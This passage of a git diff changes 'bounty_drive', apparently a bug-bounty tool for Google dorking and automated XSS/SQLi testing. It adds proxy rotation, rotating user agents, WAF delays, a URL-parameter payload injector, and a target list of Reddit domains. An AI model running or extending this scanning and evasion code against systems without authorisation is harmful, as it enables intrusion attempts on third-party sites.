scan (default: 10)", + ) + parser.add_argument( + "--page_no", + type=int, + default=DEFAULT_PAGE_NO, + help="Starting page number for Google search (default: 1)", + ) + + parser.add_argument( + "--do_dorking_google", + type=str, + default="true", + help="Perform Google dorking scan phase (default: true)", + ) + parser.add_argument( + "--do_dorking_github", + type=str, + default="true", + help="Perform Github dorking scan phase (default: true)", + ) + + parser.add_argument( + "--do_xss", + type=str, + default="true", + help="Test for XSS vulnerability (default: true)", + ) + parser.add_argument( + "--do_encode_xss", + type=str, + default="true", + help="Encode XSS payload (default: true)", + ) + parser.add_argument( + "--do_fuzzing_xss", + type=str, + default="true", + help="Fuzz XSS payload (default: true)", + ) + parser.add_argument( + "--do_blind_xss", + type=str, + default="true", + help="Test blind XSS payload (default: true)", + ) + + parser.add_argument( + "--do_sqli", + type=str, + default="true", + help="Test for SQLi vulnerability (default: true)", + ) args = parser.parse_args() @@ -69,128 +122,293 @@ def get_user_arguments_input(): subdomain = args.subdomain.lower() == "true" total_output = args.total_output page_no = args.page_no - + do_dorking_google = args.do_dorking_google.lower() == "true" do_dorking_github = args.do_dorking_github.lower() == "true" - + do_xss = args.do_xss.lower() == "true" encode_xss = args.do_encode_xss.lower() == "true" fuzzing_xss = args.do_fuzzing_xss.lower() == "true" blind_xss = args.do_blind_xss.lower() == "true" - + do_sqli = args.do_sqli.lower() == "true" + use_proxy = args.use_proxy if subdomain: with open("target.txt", "r") as file: subdomain_list = file.read().splitlines() - cprint(f"Subdomains: {subdomain_list}", 'green', file=sys.stderr) + cprint(f"Subdomains: {subdomain_list}", "green", file=sys.stderr) + + cprint( + f"Extension: {extension}, Total Output: {total_output}, Page No: {page_no}, Do Google Dorking: {do_dorking_google}, Do Github Dorking {do_dorking_github}", + "green", + file=sys.stderr, + ) + + return extension, do_dorking_google, do_dorking_github, do_sqli, do_xss, use_proxy - cprint(f"Extension: {extension}, Total Output: {total_output}, Page No: {page_no}, Do Google Dorking: {do_dorking_google}, Do Github Dorking {do_dorking_github}", 'green', file=sys.stderr) - - return extension, do_dorking_google, do_dorking_github, do_sqli, do_xss def get_user_input(): """ Collect user input for website extension, total output, and starting page number, with default values. """ - extension = input(colored(f"Please specify the website extension(eg- .in,.com,.pk) [default: {DEFAULT_EXTENSION}] -----> ", 'cyan')) or DEFAULT_EXTENSION # TODO - subdomain = input(colored(f"Do you want to restrict search to subdomain present in target.txt ? [default: true (vs false)] -----> ", 'cyan')) or "true" - total_output = input(colored(f"Please specify the total no. of websites you want [default: {DEFAULT_TOTAL_OUTPUT}] ----> ", 'cyan')) or DEFAULT_TOTAL_OUTPUT - page_no = input(colored(f"From which Google page you want to start(eg- 1,2,3) [default: {DEFAULT_PAGE_NO}] ----> ", 'cyan')) or DEFAULT_PAGE_NO - - do_dorking_google = input(colored(f"Do you want to do the Google dorking scan phase ? [default: true (vs false)] ----> ", 'cyan')) or "true" - do_dorking_github = input(colored(f"Do you want to do the Github dorking scan phase ? [default: false (vs true)] ----> ", 'cyan')) or "false" - - do_xss = input(colored(f"Do you want to test for XSS vulnerability ? [default: true (vs false)] ----> ", 'cyan')) or "true" - do_xss = True if do_xss.lower() == "true" else False + use_proxy = ( + input( + colored( + f"Do you want to use proxies ? [default: true (vs false)] -----> ", + "cyan", + ) + ) + or "true" + ) + extension = ( + input( + colored( + f"Please specify the website extension(eg- .in,.com,.pk) [default: {DEFAULT_EXTENSION}] -----> ", + "cyan", + ) + ) + or DEFAULT_EXTENSION + ) # TODO + subdomain = ( + input( + colored( + f"Do you want to restrict search to subdomain present in target.txt ? [default: true (vs false)] -----> ", + "cyan", + ) + ) + or "true" + ) + total_output = ( + input( + colored( + f"Please specify the total no. of websites you want [default: {DEFAULT_TOTAL_OUTPUT}] ----> ", + "cyan", + ) + ) + or DEFAULT_TOTAL_OUTPUT + ) + page_no = ( + input( + colored( + f"From which Google page you want to start(eg- 1,2,3) [default: {DEFAULT_PAGE_NO}] ----> ", + "cyan", + ) + ) + or DEFAULT_PAGE_NO + ) + + do_dorking_google = ( + input( + colored( + f"Do you want to do the Google dorking scan phase ? [default: true (vs false)] ----> ", + "cyan", + ) + ) + or "true" + ) + do_dorking_github = ( + input( + colored( + f"Do you want to do the Github dorking scan phase ? [default: false (vs true)] ----> ", + "cyan", + ) + ) + or "false" + ) + + do_xss = ( + input( + colored( + f"Do you want to test for XSS vulnerability ? [default: true (vs false)] ----> ", + "cyan", + ) + ) + or "true" + ) + do_xss = True if do_xss.lower() == "true" else False if do_xss: - do_encode_xss = input(colored(f"Do you want to encode XSS payload ? [default: true (vs false)] ----> ", 'cyan')) or "true" - do_fuzzing_xss = input(colored(f"Do you want to fuzz XSS payload ? [default: true (vs false)] ----> ", 'cyan')) or "true" - do_blind_xss = input(colored(f"Do you want to test blind XSS payload ? [default: true (vs false)] ----> ", 'cyan')) or "true" - ENCODE_XSS = True if do_encode_xss.lower() == "true" else False - FUZZ_XSS = True if do_fuzzing_xss.lower() == "true" else False - BLIND_XSS = True if do_blind_xss.lower() == "true" else False - - do_sqli = input(colored(f"Do you want to test for SQLi vulnerability ? [default: false (vs true)] ----> ", 'cyan')) or "false" - + do_encode_xss = ( + input( + colored( + f"Do you want to encode XSS payload ? [default: true (vs false)] ----> ", + "cyan", + ) + ) + or "true" + ) + do_fuzzing_xss = ( + input( + colored( + f"Do you want to fuzz XSS payload ? [default: true (vs false)] ----> ", + "cyan", + ) + ) + or "true" + ) + do_blind_xss = ( + input( + colored( + f"Do you want to test blind XSS payload ? [default: true (vs false)] ----> ", + "cyan", + ) + ) + or "true" + ) + xss_config.ENCODE_XSS = True if do_encode_xss.lower() == "true" else False + xss_config.FUZZ_XSS = True if do_fuzzing_xss.lower() == "true" else False + xss_config.BLIND_XSS = True if do_blind_xss.lower() == "true" else False + else: + del POTENTIAL_PATHS["xss"] + del VULN_PATHS["xss"] + + do_sqli = ( + input( + colored( + f"Do you want to test for SQLi vulnerability ? [default: false (vs true)] ----> ", + "cyan", + ) + ) + or "false" + ) + # Ensure numeric inputs are correctly converted to integers TOTAL_OUTPUT = int(total_output) - PAGE_NO = int(page_no) - do_dorking_google = True if do_dorking_google.lower() == "true" else False - do_dorking_github = True if do_dorking_github.lower() == "true" else False - subdomain = True if subdomain.lower() == "true" else False - - - do_sqli = True if do_sqli.lower() == "true" else False + PAGE_NO = int(page_no) + do_dorking_google = True if do_dorking_google.lower() == "true" else False + do_dorking_github = True if do_dorking_github.lower() == "true" else False + subdomain = True if subdomain.lower() == "true" else False + use_proxy = True if use_proxy.lower() == "true" else False + + do_sqli = True if do_sqli.lower() == "true" else False + if do_sqli: + pass + else: + del POTENTIAL_PATHS["sqli"] + del VULN_PATHS["sqli"] + if subdomain: # TODO allow multiple subdomains with open("target.txt", "r") as file: subdomain = file.read().splitlines() - SUBDOMAIN = subdomain - - cprint(f"Extension: {extension}, Total Output: {total_output}, Page No: {page_no}, Do Google Dorking: {do_dorking_google}, Do Github Dorking {do_dorking_github}", 'green', file=sys.stderr) - - return extension, do_dorking_google, do_dorking_github, do_sqli, do_xss + dorking_config.SUBDOMAIN = subdomain + + cprint( + f"Extension: {extension}, Total Output: {total_output}, Page No: {page_no}, Do Google Dorking: {do_dorking_google}, Do Github Dorking {do_dorking_github}", + "green", + file=sys.stderr, + ) + + return extension, do_dorking_google, do_dorking_github, do_sqli, do_xss, use_proxy + if __name__ == "__main__": try: load_animation() if len(sys.argv) > 3: - extension, do_dorking_google, do_dorking_github, do_sqli, do_xss = get_user_arguments_input() + ( + extension, + do_dorking_google, + do_dorking_github, + do_sqli, + do_xss, + use_proxy, + ) = get_user_arguments_input() else: - extension, do_dorking_google, do_dorking_github, do_sqli, do_xss = get_user_input() - - proxies = setup_proxies() - cprint("Number of proxies: " + str(len(proxies)), 'green', file=sys.stderr) - + ( + extension, + do_dorking_google, + do_dorking_github, + do_sqli, + do_xss, + use_proxy, + ) = get_user_input() + + for key, value in VULN_PATHS.items(): + if not os.path.exists(value[0]): + with open(value[0], "w") as file: + file.write("") + for key, value in POTENTIAL_PATHS.items(): + if not os.path.exists(value[0]): + with open(value[0], "w") as file: + file.write("") + with open(value[0].replace(".txt", "_dork.txt"), "w") as file: + file.write("") + + proxies = [None] + if use_proxy: + proxies = setup_proxies() + cprint("Number of proxies: " + str(len(proxies)), "green", file=sys.stderr) + if do_dorking_google: - cprint("\nStarting Google dorking scan phase...\n", 'yellow', file=sys.stderr) + cprint( + "\nStarting Google dorking scan phase...\n", "yellow", file=sys.stderr + ) load_google_dorks_and_search(extension, proxies) - + if do_dorking_github: - cprint("\nStarting Github dorking scan phase...\n", 'yellow', file=sys.stderr) + cprint( + "\nStarting Github dorking scan phase...\n", "yellow", file=sys.stderr + ) raise NotImplementedError("Github dorking scan phase not implemented yet") - load_github_dorks_and_search(extension, proxies) - + load_github_dorks_and_search(extension, proxies) + def read_potential_sites(): for key, value in POTENTIAL_PATHS.items(): - if not os.path.exists(value[0]): - with open(value[0], 'w') as file: - file.write('') - with open(value[0], 'r') as file: + with open(value[0], "r") as file: POTENTIAL_PATHS[key][1] = list(set(file.read().splitlines())) # Call the function to initialize the arrays read_potential_sites() - + if do_sqli: raise NotImplementedError("SQLi phase not implemented yet") website_to_test = POTENTIAL_PATHS["sqli"][1] - cprint("\nTesting websites for SQL injection vulnerability...\n", 'yellow', file=sys.stderr) + cprint( + "\nTesting websites for SQL injection vulnerability...\n", + "yellow", + file=sys.stderr, + ) if not website_to_test: - cprint("No websites found matching the dorks. Please adjust your search criteria.", 'red', file=sys.stderr) + cprint( + "No websites found matching the dorks. Please adjust your search criteria.", + "red", + file=sys.stderr, + ) test_vulnerability_sqli(proxies) - + if do_xss: website_to_test = POTENTIAL_PATHS["xss"][1] - cprint("\nTesting websites for XSS vulnerability...\n", 'yellow', file=sys.stderr) + cprint( + "\nTesting websites for XSS vulnerability...\n", + "yellow", + file=sys.stderr, + ) if not website_to_test: - cprint("No websites found matching the dorks. Please adjust your search criteria.", 'red', file=sys.stderr) + cprint( + "No websites found matching the dorks. Please adjust your search criteria.", + "red", + file=sys.stderr, + ) test_vulnerability_xss(proxies) - - cprint(banner_terminal_res , 'green', file=sys.stderr) + + cprint(banner_terminal_res, "green", file=sys.stderr) if do_sqli and VULN_PATHS["sqli"][1]: raise NotImplementedError("SQLi phase not implemented yet") - cprint("The following targets are affected with SQLi:", "red", file=sys.stderr) - for target in VULN_PATHS["sqli"][1]: + cprint( + "The following targets are affected with SQLi:", "red", file=sys.stderr + ) + for target in VULN_PATHS["sqli"][1]: cprint(target, "red", file=sys.stderr) - + if do_xss and VULN_PATHS["xss"][1]: - cprint("The following targets are affected with XSS:", "red", file=sys.stderr) - for target in VULN_PATHS["xss"][1]: + cprint( + "The following targets are affected with XSS:", "red", file=sys.stderr + ) + for target in VULN_PATHS["xss"][1]: cprint(target, "red", file=sys.stderr) - + finally: sys.stderr = orig_stdout - f.close() \ No newline at end of file + f.close() diff --git a/bounty_drive/target.txt b/bounty_drive/target.txt index 10424af..46fa6ec 100644 --- a/bounty_drive/target.txt +++ b/bounty_drive/target.txt @@ -1 +1,9 @@ -microsoft.com \ No newline at end of file +reddit.com +snooguts.net +redd.it +redditblog.com +redditmedia.com +redditstatic.com +reddituploads.com +redditinc.com +reddithelp.com \ No newline at end of file diff --git a/bounty_drive/utils/app_config.py b/bounty_drive/utils/app_config.py index 226ce93..d08c09d 100644 --- a/bounty_drive/utils/app_config.py +++ b/bounty_drive/utils/app_config.py @@ -1,84 +1,87 @@ - ######################################################################################### # Global variables ######################################################################################### # PATH -GITHUB_FILE_PATH = "reports/potential_github_sites.txt" -SQLI_FILE_PATH = "reports/potential_sqli_sites.txt" -XSS_FILE_PATH = "reports/potential_xss_sites.txt" -API_FILE_PATH = "reports/potential_api_sites.txt" -WEB_FILE_PATH = "reports/potential_web_sites.txt" -SECRET_FILE_PATH = "reports/potential_secret_sites.txt" -DLPHP_FILE_PATH = "reports/potential_dlphp_sites.txt" -BACKUP_FILE_PATH = "reports/potential_backup_sites.txt" +GITHUB_FILE_PATH = "reports/potential_github_sites.txt" +SQLI_FILE_PATH = "reports/potential_sqli_sites.txt" +XSS_FILE_PATH = "reports/potential_xss_sites.txt" +API_FILE_PATH = "reports/potential_api_sites.txt" +WEB_FILE_PATH = "reports/potential_web_sites.txt" +SECRET_FILE_PATH = "reports/potential_secret_sites.txt" +PHP_FILE_PATH = "reports/potential_dowload-php_sites.txt" +BACKUP_FILE_PATH = "reports/potential_backup_sites.txt" POTENTIAL_PATHS = { - "github": [GITHUB_FILE_PATH,[]], - "sqli": [SQLI_FILE_PATH,[]], - "xss": [XSS_FILE_PATH,[]], - "api": [API_FILE_PATH,[]], - "web": [WEB_FILE_PATH,[]], - "secret": [SECRET_FILE_PATH,[]], - "dlphp": [DLPHP_FILE_PATH,[]], - "backup": [BACKUP_FILE_PATH,[]] + "github": [GITHUB_FILE_PATH, set()], + "sqli": [SQLI_FILE_PATH, set()], + "xss": [XSS_FILE_PATH, set()], + "api": [API_FILE_PATH, set()], + "web": [WEB_FILE_PATH, set()], + "secret": [SECRET_FILE_PATH, set()], + "dowload-php": [PHP_FILE_PATH, set()], + "backup": [BACKUP_FILE_PATH, set()], } -VULN_SQLI_FILE_PATH = "reports/vulnerable_sqli_sites.txt" -VULN_XSS_FILE_PATH = "reports/vulnerable_xss_sites.txt" -VULN_API_FILE_PATH = "reports/vulnerable_api_sites.txt" -VULN_WEB_FILE_PATH = "reports/vulnerable_web_sites.txt" -VULN_SECRET_FILE_PATH = "reports/vulnerable_secret_sites.txt" -VULN_DLPHP_FILE_PATH = "reports/vulnerable_dlphp_sites.txt" -VULN_BACKUP_FILE_PATH = "reports/vulnerable_backup_sites.txt" +VULN_SQLI_FILE_PATH = "reports/vulnerable_sqli_sites.txt" +VULN_XSS_FILE_PATH = "reports/vulnerable_xss_sites.txt" +VULN_API_FILE_PATH = "reports/vulnerable_api_sites.txt" +VULN_WEB_FILE_PATH = "reports/vulnerable_web_sites.txt" +VULN_SECRET_FILE_PATH = "reports/vulnerable_secret_sites.txt" +VULN_PHP = "reports/vulnerable_dowload-php_sites.txt" +VULN_BACKUP_FILE_PATH = "reports/vulnerable_backup_sites.txt" VULN_PATHS = { - "sqli": [VULN_SQLI_FILE_PATH,[]], - "xss": [VULN_XSS_FILE_PATH,[]], - "api": [VULN_API_FILE_PATH,[]], - "web": [VULN_WEB_FILE_PATH,[]], - "secret": [VULN_SECRET_FILE_PATH,[]], - "dlphp": [VULN_DLPHP_FILE_PATH,[]], - "backup": [VULN_BACKUP_FILE_PATH,[]] + "sqli": [VULN_SQLI_FILE_PATH, set()], + "xss": [VULN_XSS_FILE_PATH, set()], + "api": [VULN_API_FILE_PATH, set()], + "web": [VULN_WEB_FILE_PATH, set()], + "secret": [VULN_SECRET_FILE_PATH, set()], + "dowload-php": [VULN_PHP, set()], + "backup": [VULN_BACKUP_FILE_PATH, set()], } # Constants for handling requests and delays -DEFAULT_EXTENSION = "" -EXTENSION = "" -DEFAULT_TOTAL_OUTPUT = 10 # TODO enforce -TOTAL_OUTPUT = 10 -DEFAULT_PAGE_NO = 1 -PAGE_NO = 1 -LANG ="en" -RECURSIVE = True +DEFAULT_EXTENSION = "" +EXTENSION = "" +DEFAULT_TOTAL_OUTPUT = 10 # TODO enforce +TOTAL_OUTPUT = 10 +DEFAULT_PAGE_NO = 1 +PAGE_NO = 1 +LANG = "en" +RECURSIVE = True USER_AGENTS = [ - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15', - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0', - 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', - 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1', - 'Mozilla/5.0 (iPad; CPU OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1', - 'Mozilla/5.0 (Linux; Android 10; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.152 Mobile Safari/537.36', - 'Mozilla/5.0 (Linux; Android 10; SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.152 Mobile Safari/537.36', - 'Mozilla/5.0 (Linux; U; Android 10; en-us; Redmi Note 9 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36', - 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36', - 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36', - 'Mozilla/5.0 (X11; CrOS x86_64 13729.56.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36', - 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36', - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36', - 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1', - 'Mozilla/5.0 (iPad; CPU OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1', - 'Mozilla/5.0 (Linux; Android 11; Pixel 4 XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Mobile Safari/537.36' + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36", + "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36", + "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36", + "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)", + "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)", + "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)", + "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", + "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)", + "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)", ] + # Initial delay and the factor by which the delay is multiplied -INITIAL_DELAY = 10 # Start with a 10-second delay -DELAY_FACTOR = 2 # Double the delay each time -MAX_DELAY = 600 # Maximum delay of 10 minutes -REQUEST_DELAY = 5 # Base delay between requests in seconds -WAF_DELAY = 600 # Delay for WAF detection in seconds +INITIAL_DELAY = 2 # Start with a 10-second delay +DELAY_FACTOR = 2 # Double the delay each time +MAX_DELAY = 600 # Maximum delay of 10 minutes +REQUEST_DELAY = 15 # Base delay between requests in seconds +WAF_DELAY = 600 # Delay for WAF detection in seconds -CURRENT_DELAY = INITIAL_DELAY # TODO add backoff timer \ No newline at end of file +CURRENT_DELAY = INITIAL_DELAY # TODO add backoff timer diff --git a/bounty_drive/utils/banner.py b/bounty_drive/utils/banner.py index 30e8e20..8dc76d7 100644 --- a/bounty_drive/utils/banner.py +++ b/bounty_drive/utils/banner.py @@ -8,72 +8,72 @@ # Animation ######################################################################################### -banner_res = (""" +banner_res = """ ___ ____ / _ \___ ___ __ __/ / /____ / , _/ -_|_-</ // / / __(_-< /_/|_|\__/___/\_,_/_/\__/___/ ***************************** - - """) + + """ banner_terminal_res = terminal_banner.Banner(banner_res) - + + def load_animation(): - banner = (""" - + banner = """ + ▄▄▄▄· ▄• ▄▌ ▐ ▄ ▄▄▄▄▄ ▄· ▄▌·▄▄▄▄ ▄▄▄ ▪ ▌ ▐·▄▄▄ . ▐█ ▀█▪▪ █▪██▌•█▌▐█•██ ▐█▪██▌██▪ ██ ▀▄ █·██ ▪█·█▌▀▄.▀· ▐█▀▀█▄ ▄█▀▄ █▌▐█▌▐█▐▐▌ ▐█.▪▐█▌▐█▪▐█· ▐█▌▐▀▀▄ ▐█·▐█▐█•▐▀▀▪▄ ██▄▪▐█▐█▌.▐▌▐█▄█▌██▐█▌ ▐█▌· ▐█▀·.██. ██ ▐█•█▌▐█▌ ███ ▐█▄▄▌ -·▀▀▀▀ ▀█▄▀▪ ▀▀▀ ▀▀ █▪ ▀▀▀ ▀ • ▀▀▀▀▀• .▀ ▀▀▀▀. ▀ ▀▀▀ - - Made with ❤️ - For the Community, By the Community +·▀▀▀▀ ▀█▄▀▪ ▀▀▀ ▀▀ █▪ ▀▀▀ ▀ • ▀▀▀▀▀• .▀ ▀▀▀▀. ▀ ▀▀▀ + + Made with ❤️ + For the Community, By the Community ################################### Made by ElNiak -linkedin - https://www.linkedin.com/in/christophe-crochet-5318a8182/ +linkedin - https://www.linkedin.com/in/christophe-crochet-5318a8182/ Github - https://github.com/elniak - - """) - banner_terminal = terminal_banner.Banner(banner) - cprint(banner_terminal , 'green', file=sys.stderr) - - load_str = "Preparing the Dorking Pentesting...." - ls_len = len(load_str) - - animation = "|/-\\" - anicount = 0 - counttime = 0 - i = 0 - while (counttime != 100): - time.sleep(0.075) - load_str_list = list(load_str) - x = ord(load_str_list[i]) - y = 0 - if x != 32 and x != 46: - if x>90: - y = x-32 - else: - y = x + 32 - load_str_list[i]= chr(y) - - res ='' - for j in range(ls_len): - res = res + load_str_list[j] - - sys.stdout.write("\r"+res + animation[anicount]) - sys.stdout.flush() - - load_str = res - - anicount = (anicount + 1)% 4 - i =(i + 1)% ls_len - counttime = counttime + 1 - - if os.name =="nt": - os.system("cls") - - else: - os.system("clear") - \ No newline at end of file + + """ + banner_terminal = terminal_banner.Banner(banner) + cprint(banner_terminal, "green", file=sys.stderr) + + load_str = "Preparing the Dorking Pentesting...." + ls_len = len(load_str) + + animation = "|/-\\" + anicount = 0 + counttime = 0 + i = 0 + while counttime != 100: + time.sleep(0.040) + load_str_list = list(load_str) + x = ord(load_str_list[i]) + y = 0 + if x != 32 and x != 46: + if x > 90: + y = x - 32 + else: + y = x + 32 + load_str_list[i] = chr(y) + + res = "" + for j in range(ls_len): + res = res + load_str_list[j] + + sys.stdout.write("\r" + res + animation[anicount]) + sys.stdout.flush() + + load_str = res + + anicount = (anicount + 1) % 4 + i = (i + 1) % ls_len + counttime = counttime + 1 + + if os.name == "nt": + os.system("cls") + + else: + os.system("clear") diff --git a/bounty_drive/utils/proxies.py b/bounty_drive/utils/proxies.py index ee22aeb..985f081 100644 --- a/bounty_drive/utils/proxies.py +++ b/bounty_drive/utils/proxies.py @@ -10,39 +10,43 @@ from termcolor import cprint import concurrent.futures from tqdm import tqdm -import sys +import sys + def round_robin_proxies(proxies): return itertools.cycle(proxies) - + + # Function to check if a proxy is up def is_proxy_alive(proxy): try: - response = requests.get('http://www.google.com', - proxies={"http": proxy, "https": proxy}, timeout=5, verify=False) + response = requests.get( + "http://www.google.com", + proxies={"http": proxy, "https": proxy}, + timeout=5, + verify=True, + ) return response.status_code == 200, proxy except requests.RequestException: return False, proxy - + + # Load proxies from file def load_proxies(file="proxies/free-proxy-list.txt"): - with open(file, 'r') as file: + with open(file, "r") as file: return [line.strip() for line in file if line.strip()] - + + def setup_proxies(): proxies = load_proxies() proxies_cp = proxies.copy() - dead_proxies = 0 - total_proxies = len(proxies) - - + dead_proxies = 0 + total_proxies = len(proxies) + lock = threading.Lock() with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: future_to_search = { - executor.submit( - is_proxy_alive, proxy - ): proxy - for proxy in proxies_cp + executor.submit(is_proxy_alive, proxy): proxy for proxy in proxies_cp } for future in tqdm( concurrent.futures.as_completed(future_to_search), @@ -50,15 +54,19 @@ def setup_proxies(): desc="Checking proxies", unit="proxy", leave=True, - position=0 + position=0, ): result = future.result() if result: with lock: if not result[0]: dead_proxies += 1 - cprint(f"Removing dead proxy {result[1]}, dead proxies {dead_proxies}/{total_proxies}", 'red', file=sys.stderr) + cprint( + f"Removing dead proxy {result[1]}, dead proxies {dead_proxies}/{total_proxies}", + "red", + file=sys.stderr, + ) proxies.remove(result[1]) cprint(f"Up proxies: {len(proxies)}") - - return proxies \ No newline at end of file + + return proxies diff --git a/bounty_drive/utils/request_manager.py b/bounty_drive/utils/request_manager.py index 4f9c009..26b4245 100644 --- a/bounty_drive/utils/request_manager.py +++ b/bounty_drive/utils/request_manager.py @@ -1,4 +1,5 @@ import json +import re import sys import time from urllib.parse import parse_qs, urlparse @@ -7,7 +8,7 @@ import requests from termcolor import cprint -from utils.app_config import WAF_DELAY +from utils.app_config import CURRENT_DELAY, INITIAL_DELAY, REQUEST_DELAY, WAF_DELAY class SearchResult: @@ -24,6 +25,7 @@ def __repr__(self): def has_query_string(url): return bool(urlparse.urlparse(url).query) + # Function to inject a payload into a given URL def inject_payload(url, payload): if has_query_string(url): @@ -37,6 +39,22 @@ def inject_payload(url, payload): url += f"{payload}" return url + +def inject_params(url, payload): + """ + Injects the payload in the parameters and returns a set + """ + injected_url = set() + temp_payload = ( + payload.replace("\\n", "$").replace("\\t", "@").replace("\\r", "!") + ) # saves the payload from the removal of \\n, \\t and \\r + injected = re.sub(r"=[^?\|&]*", "=" + str(temp_payload), str(url)) + final_payload = injected.replace("$", "\\n").replace("@", "\\t").replace("!", "\\r") + injected_url.add(final_payload) + + return injected_url + + def param_converter(data, url=False): if "str" in str(type(data)): if url: @@ -62,63 +80,62 @@ def start_request( advanced=False, is_json=False, GET=False, - url=None, data=None, headers=None, params=None, base_url=None, full_query=None, category=None, - get_urls=False, + scrap_urls=False, ): urls = None try: if GET: cprint( - f"Searching for GET: {full_query} ({category}) with proxy {proxies['https']}...", + f"Searching for GET: {base_url} and parameters {params} ({category} and with proxy {proxies['https']}) ...", "yellow", file=sys.stderr, ) response = requests.get( base_url, - data=data, + # data=data[0], headers=headers, params=params, proxies=proxies, - verify=False, - timeout=10, + verify=True, # TODO add parameter for that + timeout=REQUEST_DELAY, ) elif is_json: cprint( - f"Searching for POST + JSON: {full_query} ({category}) with proxy {proxies['https']}...", + f"Searching for POST + JSON: {base_url}/{full_query} with data {data} ({category} and with proxy {proxies['https']}) ...", "yellow", file=sys.stderr, ) response = requests.post( base_url, - json=data, + json=data[0], headers=headers, - timeout=10, - verify=False, + timeout=REQUEST_DELAY, + verify=True, proxies=proxies, ) else: cprint( - f"Searching for POST: {full_query} ({category}) with proxy {proxies['https']}...", + f"Searching for POST: {base_url}/{full_query} with data {data} ({category} and with proxy {proxies['https']}) ...", "yellow", file=sys.stderr, ) response = requests.post( base_url, - data=data, + data=data[0], headers=headers, - timeout=10, - verify=False, + timeout=REQUEST_DELAY, + verify=True, proxies=proxies, ) - # Parse - if get_urls: + # 